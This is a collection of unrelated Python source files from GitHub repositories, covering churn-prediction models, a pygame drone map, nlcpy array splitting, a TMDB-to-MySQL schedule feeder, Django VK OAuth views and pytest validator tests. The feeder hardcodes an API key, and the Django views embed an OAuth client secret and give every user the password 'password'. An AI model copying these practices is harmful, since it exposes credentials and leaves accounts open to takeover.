classification_report(y_test, y_pred_1)\r\n\r\nprint(\"Best Model Parameters:\", grid_search.best_params_)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n################### Train MLP classifier #################################\r\n\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nmodel_2 = MLPClassifier(hidden_layer_sizes=(500,), max_iter=1000)\r\n\r\nmodel_pipeline_2 = make_pipeline(trf2,trf3, model_2)\r\n\r\nmodel_pipeline_2.fit(x_train, y_train)\r\n\r\n# Make predictions on the test set\r\ny_pred_2 = model_pipeline_2.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_2)\r\nprint(accuracy)\r\nclassification_rep = classification_report(y_test, y_pred_2)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n################## Train Light Gradient Boosting ###############\r\nimport lightgbm as lgb\r\n\r\n# LightGBM Model\r\nlgb_model = lgb.LGBMClassifier( boosting_type='gbdt',objective='binary',num_leaves=2,max_depth=5,learning_rate=0.1,\r\n n_estimators=500, random_state=42)\r\n\r\n\r\nmodel_pipeline_3 = make_pipeline(trf2,trf3, lgb_model)\r\n\r\n# Train the LightGBM model\r\nmodel_pipeline_3.fit(x_train, y_train)\r\n\r\n# Predict using the LightGBM model\r\n# Make predictions on the test set\r\ny_pred_3 = model_pipeline_3.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_3)\r\nprint(accuracy)\r\nclassification_rep = classification_report(y_test, y_pred_3)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n### Fine the Model using Hyper parameters\r\n# Define the parameter grid to search\r\nparam_grid = {\r\n 'num_leaves': [15, 20, 25, 30], # Experiment with different values\r\n 'max_depth': [5, 10, 15],\r\n 'learning_rate': [0.01, 0.1, 0.2],\r\n 'n_estimators': [100, 200, 300],\r\n}\r\n\r\n# Initialize the LightGBM model\r\nlgb_model = lgb.LGBMClassifier(boosting_type='gbdt', objective='binary', random_state=42)\r\n\r\n# Initialize GridSearchCV\r\ngrid_search = GridSearchCV(lgb_model, param_grid, cv=5, scoring='accuracy')\r\n\r\nmodel_pipeline_3H = make_pipeline(trf2,trf3, grid_search)\r\n\r\n# Fit the grid search to your data\r\nmodel_pipeline_3H.fit(x_train, y_train)\r\n\r\n# Get the best model after hyperparameter tuning\r\nbest_model = grid_search.best_estimator_\r\nbest_params = grid_search.best_params_\r\n\r\nmodel_pipeline_LGBh = make_pipeline(trf2,trf3, best_model)\r\n\r\ny_pred_4 = model_pipeline_LGBh.predict(x_test)\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_4)\r\nprint(\"Best Model Parameters:\", best_params)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\n\r\n\r\n# Tried multiple modelbut all are giving around 50 % accuracy which shows model is a under fit model.\r\n\r\n################## Train Artificial Neural Network ##########################\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n# Define the neural network architecture\r\nmodel = Sequential()\r\nmodel.add(Dense(128, activation='relu', input_dim=x_train.shape[1]))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(1, activation='sigmoid')) # Binary classification\r\n\r\n# Compile the model\r\nmodel.compile(loss='binary_crossentropy', optimizer=Adam(learning_rate=0.001), metrics=['accuracy'])\r\n\r\n\r\nx_train_encod = trf2.fit_transform(x_train)\r\nx_train_scales = trf3.fit_transform(x_train_encod)\r\nx_test_encod = trf2.fit_transform(x_test)\r\nx_test_scales = trf3.fit_transform(x_test_encod)\r\n\r\nx_train = x_train_scales.astype(np.float32)\r\nx_test = x_test_scales.astype(np.float32)\r\n\r\n\r\n# Train the model\r\nmodel.fit(x_train, y_train, epochs=100, batch_size=32, validation_split=0.2, verbose=1)\r\n\r\ny_pred = model.predict(x_test_scales)\r\ny_pred_binary = [1 if val > 0.5 else 0 for val in y_pred]\r\naccuracy = accuracy_score(y_test, y_pred_binary)\r\nprint(\"Test Set Accuracy:\", accuracy)\r\n\r\n# dumping KNN classifer as it was the best one amongst all ML algorithms\r\nimport pickle\r\npickle.dump(model_pipeline,open('model_pipeline1.pkl','wb'))\r\n","repo_name":"KoriPankaj/customer_churn_predcition","sub_path":"customer_churn.py","file_name":"customer_churn.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33018747694","text":"# import the pygame module, so you can use it\r\nimport pickle\r\nimport pygame\r\nimport time\r\n\r\nfrom pygame.locals import *\r\nfrom random import random, randint\r\nimport numpy as np\r\n\r\nBLUE = (0, 0, 255)\r\nVIOLET = (136, 77, 109)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\nclass DMap:\r\n\r\n def __init__(self):\r\n self.__n = 20\r\n self.__m = 20\r\n self.__surface = np.zeros((self.__n, self.__m))\r\n for i in range(self.__n):\r\n for j in range(self.__m):\r\n self.__surface[i][j] = -1\r\n\r\n def getN(self):\r\n return self.__n\r\n\r\n def getM(self):\r\n return self.__m\r\n\r\n def getSurface(self):\r\n return self.__surface\r\n\r\n\r\n\r\n def validCoordinates(self, x, y):\r\n return 0 <= x < self.__n and 0 <= y < self.__m\r\n\r\n def getValue(self, x, y):\r\n if not self.validCoordinates(x, y):\r\n raise Exception(\" The current coordinates are not valid\")\r\n return self.__surface[x][y]\r\n\r\n def image(self, x, y):\r\n\r\n imagine = pygame.Surface((420, 420))\r\n brick = pygame.Surface((20, 20))\r\n empty = pygame.Surface((20, 20))\r\n empty.fill(WHITE)\r\n brick.fill(BLACK)\r\n imagine.fill(VIOLET)\r\n\r\n for i in range(self.__n):\r\n for j in range(self.__m):\r\n if self.__surface[i][j] == 1:\r\n imagine.blit(brick, (j * 20, i * 20))\r\n elif self.__surface[i][j] == 0:\r\n imagine.blit(empty, (j * 20, i * 20))\r\n\r\n drona = pygame.image.load(\"../drona.png\")\r\n imagine.blit(drona, (y * 20, x * 20))\r\n return imagine","repo_name":"ElinaBarabas/Drone","sub_path":"Model/DMap.py","file_name":"DMap.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10720533263","text":"import numpy\nimport nlcpy\n\n\ndef split(ary, indices_or_sections, axis=0):\n \"\"\"Splits an array into multiple sub-arrays.\n\n Parameters\n ----------\n ary : ndarray\n Array to be divided into sub-arrays.\n indices_or_sections : int or 1-D array\n If *indices_or_sections* is an integer, N, the array will be divided into N\n equal arrays along *axis*. If such a split is not possible, an error is raised.\n If *indices_or_sections* is a 1-D array of sorted integers, the entries indicate\n where along *axis* the array is split. For example, ``[2, 3]`` would,\n for ``axis=0``, result in\n\n - ary[:2]\n - ary[2:3]\n - ary[3:]\n\n If an index exceeds the dimension of the array along *axis*, an empty sub-array\n is returned correspondingly.\n axis : int, optional\n The axis along which to split, default is 0.\n\n Returns\n -------\n A list of sub-arrays.\n\n See Also\n --------\n hsplit : Splits an array into multiple sub-arrays horizontally (column-wise).\n vsplit : Splits an array into multiple sub-arrays vertically (row-wise).\n concatenate : Joins a sequence of arrays along an existing axis.\n stack : Joins a sequence of arrays along a new axis.\n hstack : Stacks arrays in sequence horizontally (column wise).\n vstack : Stacks arrays in sequence vertically (row wise).\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(9.0)\n >>> vp.split(x, 3)\n [array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7., 8.])]\n\n >>> x = vp.arange(6)\n >>> vp.split(x, [3, 4, 7])\n [array([0, 1, 2]), array([3]), array([4, 5]), array([], dtype=int64)]\n \"\"\"\n size = ary.shape[axis]\n if numpy.isscalar(indices_or_sections):\n if size % indices_or_sections:\n raise ValueError(\n 'array split does not result in an equal division')\n Nsections = int(indices_or_sections)\n if Nsections <= 0:\n raise ValueError('number sections must be larger than 0.')\n Neach_section, extras = divmod(size, Nsections)\n section_sizes = ([0] +\n extras * [Neach_section + 1] +\n (Nsections - extras) * [Neach_section])\n TH_cumsum = 2000\n if len(section_sizes) < TH_cumsum:\n div_points = numpy.array(section_sizes, dtype=nlcpy.intp).cumsum()\n else:\n div_points = nlcpy.array(section_sizes, dtype=nlcpy.intp).cumsum().tolist()\n else:\n Nsections = len(indices_or_sections) + 1\n div_points = [0] + list(indices_or_sections) + [size]\n\n sub_arys = []\n sary = nlcpy.swapaxes(ary, axis, 0)\n for i in range(Nsections):\n st = div_points[i]\n end = div_points[i + 1]\n sub_arys.append(nlcpy.swapaxes(sary[st:end], axis, 0))\n\n return sub_arys\n\n\ndef hsplit(ary, indices_or_sections):\n \"\"\"Splits an array into multiple sub-arrays horizontally (column-wise).\n\n Please refer to the :func:`split` documentation. hsplit is equivalent to\n :func:`split` with ``axis=1``, the array is always split along the second axis\n regardless of the array dimension.\n\n See Also\n --------\n split : Splits an array into multiple sub-arrays.\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(16.0).reshape(4, 4)\n >>> x\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])\n >>> vp.hsplit(x, 2)\n [array([[ 0., 1.],\n [ 4., 5.],\n [ 8., 9.],\n [12., 13.]]), array([[ 2., 3.],\n [ 6., 7.],\n [10., 11.],\n [14., 15.]])]\n >>> vp.hsplit(x, vp.array([3, 6]))\n [array([[ 0., 1., 2.],\n [ 4., 5., 6.],\n [ 8., 9., 10.],\n [12., 13., 14.]]), array([[ 3.],\n [ 7.],\n [11.],\n [15.]]), array([], shape=(4, 0), dtype=float64)]\n \"\"\"\n ary = nlcpy.asanyarray(ary)\n if ary.ndim == 0:\n raise ValueError('hsplit only works on arrays of 1 or more dimensions')\n if ary.ndim > 1:\n return split(ary, indices_or_sections, 1)\n else:\n return split(ary, indices_or_sections, 0)\n\n\ndef vsplit(ary, indices_or_sections):\n \"\"\"Splits an array into multiple sub-arrays vertically (row-wise).\n\n Please refer to the :func:`split` documentation. vsplit is equivalent to\n :func:`split` with ``axis=0`` (default), the array is always split along the\n first axis regardless of the array dimension.\n\n See Also\n --------\n split : Splits an array into multiple sub-arrays.\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(16.0).reshape(4, 4)\n >>> x\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])\n >>> vp.vsplit(x, 2)\n [array([[0., 1., 2., 3.],\n [4., 5., 6., 7.]]), array([[ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])]\n >>> z1, z2, z3 = vp.vsplit(x, vp.array([3, 6]))\n >>> z1; z2; z3;\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.]])\n array([[12., 13., 14., 15.]])\n array([], shape=(0, 4), dtype=float64)\n\n With a higher dimensional array the split is still along the first axis.\n\n >>> x = vp.arange(8.0).reshape(2, 2, 2)\n >>> x\n array([[[0., 1.],\n [2., 3.]],\n \n [[4., 5.],\n [6., 7.]]])\n >>> vp.vsplit(x, 2)\n [array([[[0., 1.],\n [2., 3.]]]), array([[[4., 5.],\n [6., 7.]]])]\n \"\"\"\n ary = nlcpy.asanyarray(ary)\n if ary.ndim < 2:\n raise ValueError('vsplit only works on arrays of 2 or more dimensions')\n return split(ary, indices_or_sections, 0)\n","repo_name":"SX-Aurora/nlcpy","sub_path":"nlcpy/manipulation/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"43"} +{"seq_id":"40318794336","text":"import requests \nimport mysql.connector\nfrom mysql.connector import Error\nimport json\nfrom faker import Faker\nfrom random import randint\nimport datetime\nimport timestring\n\nnow = datetime.datetime.now()\nnow = f'{now.year}-{now.month}-{now.day}'\nweek_ago = datetime.datetime.now() - datetime.timedelta(days=7)\nweek_ago = f'{week_ago.year}-{week_ago.month}-{week_ago.day}'\n# print(week_ago)\n\nresponse = requests.get(f'https://api.themoviedb.org/3/discover/movie?api_key=73d46027b91c9b97aad44eccdc904b85&language=en-US&sort_by=popularity.desc&include_adult=false&include_video=false&page=1&primary_release_date.gte={week_ago}&primary_release_date.lte={now}&vote_count.gte=1')\nnow_playing = response.json()\nnow_playing = now_playing['results']\n\n# print(now_playing)\ntry:\n connection = mysql.connector.connect(host='127.0.0.1',\n database='engi_cinema',\n user='root',\n password='')\n\n# now_playing = response.json()\n# now_playing = now_playing['results']\n array_film = []\n for film in now_playing:\n array_film.append((film['id'],film['release_date'],film['vote_average']))\n\n # print(array_film)\n array_min = [0,5]\n\n if connection.is_connected():\n db_Info = connection.get_server_info()\n print(\"Connected to MySQL Server version \", db_Info)\n cursor = connection.cursor()\n cursor.execute(\"select database();\")\n # cursor.execute()\n record = cursor.fetchone()\n for i in array_film:\n # print(i)\n # release_date = None\n release_date = datetime.datetime.strptime(i[1], '%Y-%m-%d').date()\n # week_ago = release_date + datetime.timedelta(days=2)\n print(week_ago)\n cursor.execute(f\"SELECT DISTINCT movieID FROM `schedule` WHERE movieID = {i[0]};\")\n if (cursor.fetchone() == None):\n print('bisa',i)\n arr_temp = []\n for j in range(5):\n temp = release_date + datetime.timedelta(days=j)\n temp = datetime.datetime(temp.year, temp.month, temp.day, randint(10,23), randint(0,5)*10+array_min[randint(0,1)], 0)\n arr_temp.append(temp)\n a = sorted(arr_temp)\n for temp in a:\n date = temp.strftime('%Y-%m-%d')\n time = temp.strftime('%I.%M %p')\n query = f'INSERT INTO `schedule`(`movieID`, `scheduleDate`, `scheduleTime`, `seat`) VALUES ({i[0]},\\'{date}\\',\\'{time}\\',30)'\n # print(query)\n cursor.execute(query)\n # else:\n # print('tidak bisa',i)\n connection.commit() \n\nexcept Error as e:\n print(\"Error while connecting to MySQL\", e)\nfinally:\n if (connection.is_connected()):\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")","repo_name":"nixonandhika/Engima","sub_path":"util/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11174516578","text":"import numpy as np\nimport random\nimport cv2\nimport albumentations as A\n\nkeypoints = [\n (100, 100, 50, np.pi/4.0),\n (720, 410, 50, np.pi/4.0),\n (1100, 400, 50, np.pi/4.0),\n (1700, 30, 50, np.pi/4.0),\n (300, 650, 50, np.pi/4.0),\n (1570, 590, 50, np.pi/4.0),\n (560, 800, 50, np.pi/4.0),\n (1300, 750, 50, np.pi/4.0),\n (900, 1000, 50, np.pi/4.0),\n (910, 780, 50, np.pi/4.0),\n (670, 670, 50, np.pi/4.0),\n (830, 670, 50, np.pi/4.0),\n (1000, 670, 50, np.pi/4.0),\n (1150, 670, 50, np.pi/4.0),\n (820, 900, 50, np.pi/4.0),\n (1000, 900, 50, np.pi/4.0),\n] # 15개 \n\nKEYPOINT_COLOR = (0, 255, 0) # Green\n\ndef vis_keypoints(image, keypoints, color=KEYPOINT_COLOR, diameter=15):\n image = image.copy()\n for (x, y, s, a) in keypoints:\n print(x, y, s, a)\n cv2.circle(image, (int(x), int(y)), diameter, color, -1)\n\n x0 = int(x) + s * np.cos(a)\n y0 = int(y) - s * np.sin(a)\n cv2.arrowedLine(image, (int(x), int(y)), (int(x0), int(y0)), color, 2)\n\n cv2.imshow(\"test\", image)\n cv2.waitKey(0)\n\nimage = cv2.imread(\"./2022.12/12.15_d52_image/data/fox.png\")\n# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# vis_keypoints(image, keypoints)\n\ntransform = A.Compose([\n A.ShiftScaleRotate(p=1),\n], keypoint_params=A.KeypointParams(format='xysa', angle_in_degrees=False))\n\ntransformed = transform(image=image, keypoints=keypoints)\nvis_keypoints(transformed['image'], transformed['keypoints'])\n\n\n","repo_name":"yeoiksu/Microsoft-AI-School","sub_path":"2022.12/12.15_d52_image/02_keypoint.py","file_name":"02_keypoint.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"28183243920","text":"import urllib\nimport json\nimport vk\n\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom MainApp.models import User, Post\nfrom . import tools\n\n# Create your views here.\n\n\ndef get_access_token(request):\n client_id = '6340308'\n client_secret = 'K1umBhHtCQNdl6LW8bVk'\n redirect_uri = 'http://turmezzz.pythonanywhere.com/get_access_token'\n code = request.GET['code']\n url = f'https://oauth.vk.com/access_token?client_id={client_id}&client_secret={client_secret}&redirect_uri={redirect_uri}&code={code}'\n data = json.loads(urllib.request.urlopen(url).read())\n access_token = data['access_token']\n vk_id = data['user_id']\n\n user = auth.authenticate(username=vk_id, password='password')\n if user is None or user.is_anonymous():\n user = User.objects.create(username=vk_id, access_token=access_token)\n user.set_password('password')\n user.save()\n auth.login(request, user)\n tool = tools.Tool(request)\n tool.create_new_account()\n auth.authenticate(username=vk_id, password='password')\n else:\n user = User.objects.get(username=vk_id)\n user.access_token = access_token\n user.save()\n auth.login(request, user)\n tool = tools.Tool(request)\n tool.update_posts()\n return redirect('home')\n\n\ndef login(request):\n if request.user.is_authenticated():\n return redirect('home')\n else:\n return render(request, 'MainApp/auth.html')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('login')\n\n\ndef home(request):\n if not request.user.is_authenticated():\n return redirect('login')\n\n tool = tools.Tool(request)\n tool.update_posts()\n img_url = tool.get_img_url()\n name = tool.get_name()\n\n data = {'img_url': img_url, 'name': name}\n return render(request, 'MainApp/home.html', data)\n\n\ndef search(request):\n if not request.user.is_authenticated():\n return redirect('login')\n\n # Здесь не происходит обновления постов\n\n if request.method == 'GET':\n q = request.GET['q']\n tool = tools.Tool(request)\n posts = tools.search(request.user, q)\n messages = []\n img_url = tool.get_img_url()\n name = tool.get_name()\n\n if len(posts) == 0:\n messages = ['По запросу не найдено постов']\n\n data = {'query': q, 'img_url': img_url, 'name': name, 'posts': posts, 'messages': messages}\n return render(request, 'MainApp/output.html', data)\n return HttpResponse('reload page')\n\n","repo_name":"turmezzz/Vlery","sub_path":"MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"42878778601","text":"# :coding: utf-8\n\nimport pytest\nimport six\n\nimport wiz.validator\nimport wiz.exception\n\n\ndef test_validate_definition_minimal():\n \"\"\"Validate minimal definition data mapping.\"\"\"\n wiz.validator.validate_definition({\"identifier\": \"foo\"})\n\n\ndef test_validate_definition_with_version():\n \"\"\"Validate definition data mapping with 'version' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\"\n })\n\n\ndef test_validate_definition_with_description():\n \"\"\"Validate definition data mapping with 'description' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"description\": \"This is a definition\",\n })\n\n\ndef test_validate_definition_with_disabled():\n \"\"\"Validate definition data mapping with 'disabled' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"disabled\": True,\n })\n\n\ndef test_validate_definition_with_auto_use():\n \"\"\"Validate definition data mapping with 'auto-use' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"auto-use\": True,\n })\n\n\ndef test_validate_definition_with_system():\n \"\"\"Validate definition data mapping with 'system' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"system\": {\n \"platform\": \"linux\",\n \"os\": \"el >=7, <8\",\n \"arch\": \"x86_64\"\n },\n })\n\n\ndef test_validate_definition_with_environ():\n \"\"\"Validate definition data mapping with 'environ' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"environ\": {\n \"KEY1\": \"VALUE1\",\n \"KEY2\": \"VALUE2\",\n \"KEY3\": \"PATH1:PATH2:PATH3\"\n },\n })\n\n\ndef test_validate_definition_with_command():\n \"\"\"Validate definition data mapping with 'command' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"command\": {\n \"app\": \"App0.1\",\n \"appX\": \"App0.1 --option value\"\n },\n })\n\n\ndef test_validate_definition_with_requirements():\n \"\"\"Validate definition data mapping with 'requirements' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"requirements\": [\n \"envA >= 1.0.0\",\n \"envB >= 3.4.2, < 4\",\n \"envC\"\n ],\n })\n\n\ndef test_validate_definition_with_conditions():\n \"\"\"Validate definition data mapping with 'conditions' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"conditions\": [\n \"envA >= 1.0.0\",\n \"envB >= 3.4.2, < 4\",\n \"envC\"\n ],\n })\n\n\ndef test_validate_definition_with_variants():\n \"\"\"Validate definition data mapping with 'variants' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"variants\": [\n {\n \"identifier\": \"1.0\",\n \"environ\": {\n \"VERSION\": \"1.0\"\n },\n \"requirements\": [\n \"envA >= 1.0, < 2\"\n ]\n },\n {\n \"identifier\": \"2.0\",\n \"environ\": {\n \"VERSION\": \"2.0\"\n },\n \"command\": {\n \"app\": \"App2.0\",\n },\n \"requirements\": [\n \"envA >= 2.0, < 3\"\n ]\n },\n {\n \"identifier\": \"XXX\",\n \"command\": {\n \"app\": \"AppXXX\",\n },\n }\n ],\n })\n\n\n@pytest.mark.parametrize(\"value, message\", [\n (42, \"Data has incorrect type.\"),\n ({\"test\": \"foo\"}, \"Data contains invalid keywords: test\"),\n ({}, \"'identifier' is required.\"),\n ({\"identifier\": 0}, \"'identifier' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"version\": 0}, \"'version' has incorrect type.\"),\n (\n {\"identifier\": \"foo\", \"description\": 0},\n \"'description' has incorrect type.\"\n ),\n ({\"identifier\": \"foo\", \"disabled\": 0}, \"'disabled' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"system\": 0}, \"'system' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"environ\": 0}, \"'environ' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"command\": 0}, \"'command' has incorrect type.\"),\n (\n {\"identifier\": \"foo\", \"requirements\": 0},\n \"'requirements' has incorrect type.\"\n ),\n (\n {\"identifier\": \"foo\", \"conditions\": 0},\n \"'conditions' has incorrect type.\"\n ),\n ({\"identifier\": \"foo\", \"variants\": 0}, \"'variants' has incorrect type.\"),\n], ids=[\n \"incorrect-type\",\n \"invalid-keywords\",\n \"identifier-missing\",\n \"identifier-incorrect\",\n \"version-incorrect\",\n \"description-incorrect\",\n \"disabled-incorrect\",\n \"system-incorrect\",\n \"environ-incorrect\",\n \"command-incorrect\",\n \"requirements-incorrect\",\n \"conditions-incorrect\",\n \"variants-incorrect\",\n])\ndef test_validate_definition_failed(value, message):\n \"\"\"Raise error when data is incorrect.\"\"\"\n with pytest.raises(wiz.exception.DefinitionError) as error:\n wiz.validator.validate_definition(value)\n\n assert message in str(error)\n\n\ndef test_validate_identifier_keyword():\n \"\"\"Validate 'identifier' keyword within data.\"\"\"\n wiz.validator.validate_identifier_keyword({\"identifier\": \"foo\"})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({}, {}, \"'identifier' is required.\"),\n ({\"identifier\": 42}, {}, \"'identifier' has incorrect type.\"),\n ({}, {\"variant_index\": 1}, \"'variants/1/identifier' is required.\"),\n], ids=[\n \"required\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_identifier_keyword_failed(value, options, message):\n \"\"\"Raise error when 'identifier' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_identifier_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_version_keyword():\n \"\"\"Validate 'version' keyword within data.\"\"\"\n wiz.validator.validate_version_keyword({})\n wiz.validator.validate_version_keyword({\"version\": \"0.1.0\"})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"version\": 42}, \"'version' has incorrect type.\"),\n ({\"version\": \"_\"}, \"Invalid version: '_'\"),\n ({\"version\": \"abc\"}, \"Invalid version: 'abc'\"),\n ({\"version\": \"test0.1.0\"}, \"Invalid version: 'test0.1.0'\"),\n ({\"version\": \"0.1.*\"}, \"Invalid version: '0.1.*'\"),\n ({\"version\": \"0.1.\"}, \"Invalid version: '0.1.'\"),\n ({\"version\": \"#@;\"}, \"Invalid version: '#@;'\"),\n], ids=[\n \"incorrect-type\",\n \"incorrect-version-1\",\n \"incorrect-version-2\",\n \"incorrect-version-3\",\n \"incorrect-version-4\",\n \"incorrect-version-5\",\n \"incorrect-version-6\",\n])\ndef test_validate_version_keyword_failed(value, message):\n \"\"\"Raise error when 'version' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_version_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_namespace_keyword():\n \"\"\"Validate 'namespace' keyword within data.\"\"\"\n wiz.validator.validate_namespace_keyword({})\n wiz.validator.validate_namespace_keyword({\"namespace\": \"foo\"})\n\n\ndef test_validate_namespace_keyword_failed():\n \"\"\"Raise error when 'namespace' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_namespace_keyword({\"namespace\": True})\n\n assert \"'namespace' has incorrect type.\" in str(error)\n\n\ndef test_validate_description_keyword():\n \"\"\"Validate 'description' keyword within data.\"\"\"\n wiz.validator.validate_description_keyword({})\n wiz.validator.validate_description_keyword({\"description\": \"test\"})\n\n\ndef test_validate_description_keyword_failed():\n \"\"\"Raise error when 'description' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_description_keyword({\"description\": True})\n\n assert \"'description' has incorrect type.\" in str(error)\n\n\ndef test_validate_auto_use_keyword():\n \"\"\"Validate 'auto-use' keyword within data.\"\"\"\n wiz.validator.validate_auto_use_keyword({})\n wiz.validator.validate_auto_use_keyword({\"auto-use\": True})\n\n\ndef test_validate_auto_use_keyword_failed():\n \"\"\"Raise error when 'auto-use' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_auto_use_keyword({\"auto-use\": \"foo\"})\n\n assert \"'auto-use' has incorrect type.\" in str(error)\n\n\ndef test_validate_disabled_keyword():\n \"\"\"Validate 'disabled' keyword within data.\"\"\"\n wiz.validator.validate_disabled_keyword({})\n wiz.validator.validate_disabled_keyword({\"disabled\": True})\n\n\ndef test_validate_disabled_keyword_failed():\n \"\"\"Raise error when 'disabled' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_disabled_keyword({\"disabled\": \"foo\"})\n\n assert \"'disabled' has incorrect type.\" in str(error)\n\n\ndef test_validate_install_root_keyword():\n \"\"\"Validate 'install-root' keyword within data.\"\"\"\n wiz.validator.validate_install_root_keyword({})\n wiz.validator.validate_install_root_keyword({\n \"install-root\": \"/path/to/install/root\"\n })\n\n\ndef test_validate_install_root_keyword_failed():\n \"\"\"Raise error when 'install-root' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_install_root_keyword({\"install-root\": False})\n\n assert \"'install-root' has incorrect type.\" in str(error)\n\n\ndef test_validate_install_location_keyword():\n \"\"\"Validate 'install-location' keyword within data.\"\"\"\n wiz.validator.validate_install_location_keyword({})\n wiz.validator.validate_install_location_keyword({\n \"install-location\": \"/path/to/install/location\"\n })\n\n\ndef test_validate_install_location_keyword_failed():\n \"\"\"Raise error when 'install-location' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_install_location_keyword({\"install-location\": 0})\n\n assert \"'install-location' has incorrect type.\" in str(error)\n\n\ndef test_validate_system_keyword():\n \"\"\"Validate 'system' keyword within data.\"\"\"\n wiz.validator.validate_system_keyword({})\n wiz.validator.validate_system_keyword({\"system\": {\"platform\": \"linux\"}})\n wiz.validator.validate_system_keyword({\"system\": {\"os\": \"el >= 7.4\"}})\n wiz.validator.validate_system_keyword({\"system\": {\"arch\": \"x86_64\"}})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"system\": {}}, \"'system' should not be empty.\"),\n ({\"system\": 42}, \"'system' has incorrect type.\"),\n ({\"system\": {\"test\": \"foo\"}}, \"'system' contains invalid keywords: test\"),\n ({\"system\": {\"platform\": 42}}, \"system/platform' has incorrect type.\"),\n ({\"system\": {\"os\": 42}}, \"system/os' has incorrect type.\"),\n ({\"system\": {\"arch\": 42}}, \"system/arch' has incorrect type.\"),\n], ids=[\n \"empty\",\n \"incorrect-type\",\n 